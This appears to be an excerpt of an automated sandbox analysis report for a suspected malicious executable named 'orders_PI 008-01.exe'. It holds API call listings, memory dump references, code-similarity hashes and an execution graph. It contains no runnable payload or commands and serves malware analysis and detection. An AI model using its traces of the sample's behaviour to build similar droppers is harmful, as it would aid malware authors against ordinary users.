                                        • GlobalAlloc.KERNEL32(?,00000000,?,00000000,6FF42238,?,00000808), ref: 6FF4163C
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FF42238,?,00000808), ref: 6FF41650
                                        • GetProcAddress.KERNEL32(6FF42238,00000000), ref: 6FF41657
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF41660
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                         • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                        • String ID:
                                        • API String ID: 1148316912-0
                                        • Opcode ID: 255eb3491d811a9660292a1617febdd4106d6334ddc09c869aa98417be239fdd
                                        • Instruction ID: 83b148139e687a40eeb4b3351d7456361b3484777bd9221430eff7d580bf38b7
                                        • Opcode Fuzzy Hash: 255eb3491d811a9660292a1617febdd4106d6334ddc09c869aa98417be239fdd
                                        • Instruction Fuzzy Hash: 39F037721165387FDA202AAB8C4CD9B7E9CEF9B2F5B110311F718E12A1C5624C25DBF1
                                        APIs
                                        • CharNextW.USER32(?,?,C:\,?,00405DE2,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                        • CharNextW.USER32(00000000), ref: 00405D81
                                        • CharNextW.USER32(00000000), ref: 00405D99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: C:\
                                        • API String ID: 3213498283-3404278061
                                        • Opcode ID: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                        • Instruction ID: 839f6a4cd7818f8bbcc29dd9d6e935739f9a8baf6e4a15472bca77c663bd0c43
                                        • Opcode Fuzzy Hash: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                        • Instruction Fuzzy Hash: 1FF09022920F1296DB3177545C4DE7B5BB8EF54760B00C43BE601B72C1E3B84C818EAA
                                        APIs
                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,?,?,?), ref: 00405CC9
                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,?,?,?), ref: 00405CD3
                                        • lstrcatW.KERNEL32(?,0040A014,?,?,?,?), ref: 00405CE5
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-4083868402
                                        • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                        • Instruction ID: 20018de61182ae54b5e078598b4ece42ca391df12eccfc729252e8f5514d5294
                                        • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                        • Instruction Fuzzy Hash: 78D0A731101A30AAD1117B448D04CDF629CFE85304341403BF202B30A2C77C1D5387FD
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,0040318F,?,?,?,?,?), ref: 00402FC4
                                        • GetTickCount.KERNEL32 ref: 00402FE2
                                        • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                        • ShowWindow.USER32(00000000,?,?,?,?,?), ref: 0040300D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                        • Instruction ID: 8c281f3aa7e88f802b7d8bba4993e69035ed424970cff038758a163d63a680ad
                                        • Opcode Fuzzy Hash: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                        • Instruction Fuzzy Hash: 3AF0BE30506221ABC2616F60FE0CA8B3B78FB44B51705C83BF101F11E4CB3808819B9D
                                        APIs
                                        • FreeLibrary.KERNEL32(?,75573420,00000000,C:\Users\user\AppData\Local\Temp\,00403A00,00403816,?,?,?,?,?), ref: 00403A42
                                        • GlobalFree.KERNEL32(00C213C0), ref: 00403A49
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A28
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-4083868402
                                        • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                        • Instruction ID: 10b089f61d7fd26560bcfb3f790e8945b6a0be01d7b58778b04adbc7300f8739
                                        • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                        • Instruction Fuzzy Hash: 64E0123360112057C6215F45FE0475ABB7D6F49B26F06803BE9C0BB26087785C838FD8
                                        APIs
                                        • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\orders_PI 008-01.exe,C:\Users\user\Desktop\orders_PI 008-01.exe,80000000,?,?,?,?,?), ref: 00405D15
                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\orders_PI 008-01.exe,C:\Users\user\Desktop\orders_PI 008-01.exe,80000000,?,?,?,?,?), ref: 00405D25
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-1876063424
                                        • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                        • Instruction ID: 3b4219a6871f3e4e2040e57eeeef2aaac809f1ec38f5d31038b50c09059f2d31
                                        • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                        • Instruction Fuzzy Hash: 97D05EB34109209AE3127704DC0599F73E8EF5530074A8467E541A61A5D7785C818AAC
                                        APIs
                                        • GlobalAlloc.KERNEL32(?,?), ref: 6FF4116A
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF411C7
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF411D9
                                        • GlobalFree.KERNEL32(?), ref: 6FF41203
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                        • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID:
                                        • API String ID: 1780285237-0
                                        • Opcode ID: cac0c61c526f5ef47cd6c06ceaf58fd99222d31e3f5d3b46c761a8532c4c2659
                                        • Instruction ID: e1875f5905329ca1e6eb62d673c14b64caa1488bbc2c90aacdbc40e35b9f0f92
                                        • Opcode Fuzzy Hash: cac0c61c526f5ef47cd6c06ceaf58fd99222d31e3f5d3b46c761a8532c4c2659
                                        • Instruction Fuzzy Hash: 4F31A1B64102069BDB02AF7CC945B667FECEF96320714021AE844D7363E774E9758B60
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E59
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E71
                                        • CharNextA.USER32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E82
                                        • lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E8B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                        • Instruction ID: a1795947179755a411c98c1569971d2b6f4e38ea7894d212e8297337e4f71977
                                        • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                        • Instruction Fuzzy Hash: E2F06231504514FFD7129BA5DD409AEBBA8EF06250B2540BAE884FB250D674DF029BE9

                                        Execution Graph

                                        Execution Coverage: 2.5%
                                        Dynamic/Decrypted Code Coverage: 96.8%
                                        Signature Coverage: 1.3%
                                        Total number of Nodes: 1712
                                        Total number of Limit Nodes: 5
                                        execution_graph 6390 344b2049 6392 344b2055 ___DestructExceptionObject 6390->6392 6391 344b205e 6392->6391 6393 344b207d 6392->6393 6394 344b20d3 6392->6394 6404 344b244c 6393->6404 6425 344b2639 IsProcessorFeaturePresent 6394->6425 6397 344b20da 6398 344b2082 6413 344b2308 6398->6413 6400 344b2087 __RTC_Initialize 6416 344b20c4 6400->6416 6402 344b209f 6419 344b260b 6402->6419 6405 344b2451 ___scrt_release_startup_lock 6404->6405 6406 344b2455 6405->6406 6410 344b2461 6405->6410 6429 344b527a 6406->6429 6409 344b246e 6409->6398 6410->6409 6432 344b499b 6410->6432 6511 344b34c7 RtlInterlockedFlushSList 6413->6511 6415 344b2312 6415->6400 6513 344b246f 6416->6513 6418 344b20c9 ___scrt_release_startup_lock 6418->6402 6420 344b2617 6419->6420 6421 344b262d 6420->6421 6554 344b53ed 6420->6554 6421->6391 6426 344b264e ___scrt_fastfail 6425->6426 6427 344b26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6426->6427 6428 344b2744 ___scrt_fastfail 6427->6428 6428->6397 6454 344b5132 6429->6454 6433 344b49a7 _abort 6432->6433 6434 344b49bf 6433->6434 6476 344b4af5 GetModuleHandleW 6433->6476 6485 344b5671 RtlEnterCriticalSection 6434->6485 6441 344b4aae 6501 344bbdc9 6441->6501 6442 344b4a82 6493 344b4ab4 6442->6493 6443 344b49c7 6445 344b4a3c 6443->6445 6447 344b527a _abort 20 API calls 6443->6447 6453 344b4a65 6443->6453 6444 344b4a54 6450 344b4669 _abort 5 API calls 6444->6450 6445->6444 6486 344b4669 6445->6486 6447->6445 6450->6453 6490 344b4aa5 6453->6490 6457 344b50e1 6454->6457 6456 344b245f 6456->6398 6458 344b50ed ___DestructExceptionObject 6457->6458 6465 344b5671 RtlEnterCriticalSection 6458->6465 6460 344b50fb 6466 344b515a 6460->6466 6464 344b5119 _abort 6464->6456 6465->6460 6469 344b5182 6466->6469 6470 344b517a 6466->6470 6467 344b2ada _ValidateLocalCookies 5 API calls 6468 344b5108 6467->6468 6472 344b5126 6468->6472 6469->6470 6471 344b571e _free 20 API calls 6469->6471 6470->6467 
6471->6470 6475 344b56b9 RtlLeaveCriticalSection 6472->6475 6474 344b5130 6474->6464 6475->6474 6477 344b49b3 6476->6477 6477->6434 6478 344b4b39 GetModuleHandleExW 6477->6478 6479 344b4b63 GetProcAddress 6478->6479 6480 344b4b78 6478->6480 6479->6480 6481 344b4b8c FreeLibrary 6480->6481 6482 344b4b95 6480->6482 6481->6482 6483 344b2ada _ValidateLocalCookies 5 API calls 6482->6483 6484 344b4b9f 6483->6484 6484->6434 6485->6443 6487 344b4698 6486->6487 6488 344b2ada _ValidateLocalCookies 5 API calls 6487->6488 6489 344b46c1 6488->6489 6489->6444 6504 344b56b9 RtlLeaveCriticalSection 6490->6504 6492 344b4a7e 6492->6441 6492->6442 6505 344b6025 6493->6505 6496 344b4ae2 6499 344b4b39 _abort 8 API calls 6496->6499 6497 344b4ac2 GetPEB 6497->6496 6498 344b4ad2 GetCurrentProcess TerminateProcess 6497->6498 6498->6496 6500 344b4aea ExitProcess 6499->6500 6502 344b2ada _ValidateLocalCookies 5 API calls 6501->6502 6503 344bbdd4 6502->6503 6503->6503 6504->6492 6506 344b604a 6505->6506 6510 344b6040 6505->6510 6507 344b5c45 __dosmaperr 5 API calls 6506->6507 6507->6510 6508 344b2ada _ValidateLocalCookies 5 API calls 6509 344b4abe 6508->6509 6509->6496 6509->6497 6510->6508 6512 344b34d7 6511->6512 6512->6415 6518 344b53ff 6513->6518 6525 344b5c2b 6518->6525 6521 344b391b 6522 344b354d 6521->6522 6523 344b3925 6521->6523 6522->6418 6536 344b3b2c 6523->6536 6526 344b2476 6525->6526 6527 344b5c35 6525->6527 6526->6521 6529 344b5db2 6527->6529 6530 344b5c45 __dosmaperr 5 API calls 6529->6530 6531 344b5dd9 6530->6531 6532 344b5df1 TlsFree 6531->6532 6533 344b5de5 6531->6533 6532->6533 6534 344b2ada _ValidateLocalCookies 5 API calls 6533->6534 6535 344b5e02 6534->6535 6535->6526 6541 344b3a82 6536->6541 6538 344b3b46 6539 344b3b5e TlsFree 6538->6539 6540 344b3b52 6538->6540 6539->6540 6540->6522 6542 344b3aaa 6541->6542 6546 344b3aa6 __crt_fast_encode_pointer 6541->6546 6542->6546 6547 344b39be 6542->6547 6545 344b3ac4 GetProcAddress 6545->6546 6546->6538 6550 344b39cd 
try_get_first_available_module 6547->6550 6548 344b3a77 6548->6545 6548->6546 6549 344b39ea LoadLibraryExW 6549->6550 6551 344b3a05 GetLastError 6549->6551 6550->6548 6550->6549 6552 344b3a60 FreeLibrary 6550->6552 6553 344b3a38 LoadLibraryExW 6550->6553 6551->6550 6552->6550 6553->6550 6565 344b74da 6554->6565 6557 344b3529 6558 344b3532 6557->6558 6564 344b3543 6557->6564 6559 344b391b ___vcrt_uninitialize_ptd 6 API calls 6558->6559 6560 344b3537 6559->6560 6569 344b3972 6560->6569 6564->6421 6568 344b74f3 6565->6568 6566 344b2ada _ValidateLocalCookies 5 API calls 6567 344b2625 6566->6567 6567->6557 6568->6566 6570 344b353c 6569->6570 6571 344b397d 6569->6571 6573 344b3c50 6570->6573 6572 344b3987 RtlDeleteCriticalSection 6571->6572 6572->6570 6572->6572 6574 344b3c7f 6573->6574 6576 344b3c59 6573->6576 6574->6564 6575 344b3c69 FreeLibrary 6575->6576 6576->6574 6576->6575 7480 344b5348 7481 344b3529 ___vcrt_uninitialize 8 API calls 7480->7481 7482 344b534f 7481->7482 7483 344b7b48 7493 344b8ebf 7483->7493 7487 344b7b55 7506 344b907c 7487->7506 7490 344b7b7f 7491 344b571e _free 20 API calls 7490->7491 7492 344b7b8a 7491->7492 7510 344b8ec8 7493->7510 7495 344b7b50 7496 344b8fdc 7495->7496 7497 344b8fe8 ___DestructExceptionObject 7496->7497 7530 344b5671 RtlEnterCriticalSection 7497->7530 7499 344b905e 7544 344b9073 7499->7544 7501 344b8ff3 7501->7499 7503 344b9032 RtlDeleteCriticalSection 7501->7503 7531 344ba09c 7501->7531 7502 344b906a _abort 7502->7487 7504 344b571e _free 20 API calls 7503->7504 7504->7501 7507 344b9092 7506->7507 7508 344b7b64 RtlDeleteCriticalSection 7506->7508 7507->7508 7509 344b571e _free 20 API calls 7507->7509 7508->7487 7508->7490 7509->7508 7511 344b8ed4 ___DestructExceptionObject 7510->7511 7520 344b5671 RtlEnterCriticalSection 7511->7520 7513 344b8f77 7525 344b8f97 7513->7525 7516 344b8f83 _abort 7516->7495 7518 344b8ee3 7518->7513 7519 344b8e78 66 API calls 7518->7519 7521 344b7b94 RtlEnterCriticalSection 7518->7521 7522 344b8f6d 
7518->7522 7519->7518 7520->7518 7521->7518 7528 344b7ba8 RtlLeaveCriticalSection 7522->7528 7524 344b8f75 7524->7518 7529 344b56b9 RtlLeaveCriticalSection 7525->7529 7527 344b8f9e 7527->7516 7528->7524 7529->7527 7530->7501 7532 344ba0a8 ___DestructExceptionObject 7531->7532 7533 344ba0b9 7532->7533 7534 344ba0ce 7532->7534 7535 344b6368 _free 20 API calls 7533->7535 7536 344ba0c9 _abort 7534->7536 7547 344b7b94 RtlEnterCriticalSection 7534->7547 7537 344ba0be 7535->7537 7536->7501 7539 344b62ac ___std_exception_copy 26 API calls 7537->7539 7539->7536 7540 344ba0ea 7548 344ba026 7540->7548 7542 344ba0f5 7564 344ba112 7542->7564 7812 344b56b9 RtlLeaveCriticalSection 7544->7812 7546 344b907a 7546->7502 7547->7540 7549 344ba048 7548->7549 7550 344ba033 7548->7550 7556 344ba043 7549->7556 7567 344b8e12 7549->7567 7551 344b6368 _free 20 API calls 7550->7551 7552 344ba038 7551->7552 7554 344b62ac ___std_exception_copy 26 API calls 7552->7554 7554->7556 7556->7542 7557 344b907c 20 API calls 7558 344ba064 7557->7558 7573 344b7a5a 7558->7573 7560 344ba06a 7580 344badce 7560->7580 7563 344b571e _free 20 API calls 7563->7556 7811 344b7ba8 RtlLeaveCriticalSection 7564->7811 7566 344ba11a 7566->7536 7568 344b8e2a 7567->7568 7572 344b8e26 7567->7572 7569 344b7a5a 26 API calls 7568->7569 7568->7572 7570 344b8e4a 7569->7570 7595 344b9a22 7570->7595 7572->7557 7574 344b7a7b 7573->7574 7575 344b7a66 7573->7575 7574->7560 7576 344b6368 _free 20 API calls 7575->7576 7577 344b7a6b 7576->7577 7578 344b62ac ___std_exception_copy 26 API calls 7577->7578 7579 344b7a76 7578->7579 7579->7560 7581 344baddd 7580->7581 7582 344badf2 7580->7582 7584 344b6355 __dosmaperr 20 API calls 7581->7584 7583 344bae2d 7582->7583 7587 344bae19 7582->7587 7585 344b6355 __dosmaperr 20 API calls 7583->7585 7586 344bade2 7584->7586 7588 344bae32 7585->7588 7589 344b6368 _free 20 API calls 7586->7589 7768 344bada6 7587->7768 7591 344b6368 _free 20 API calls 7588->7591 7592 344ba070 7589->7592 7593 344bae3a 
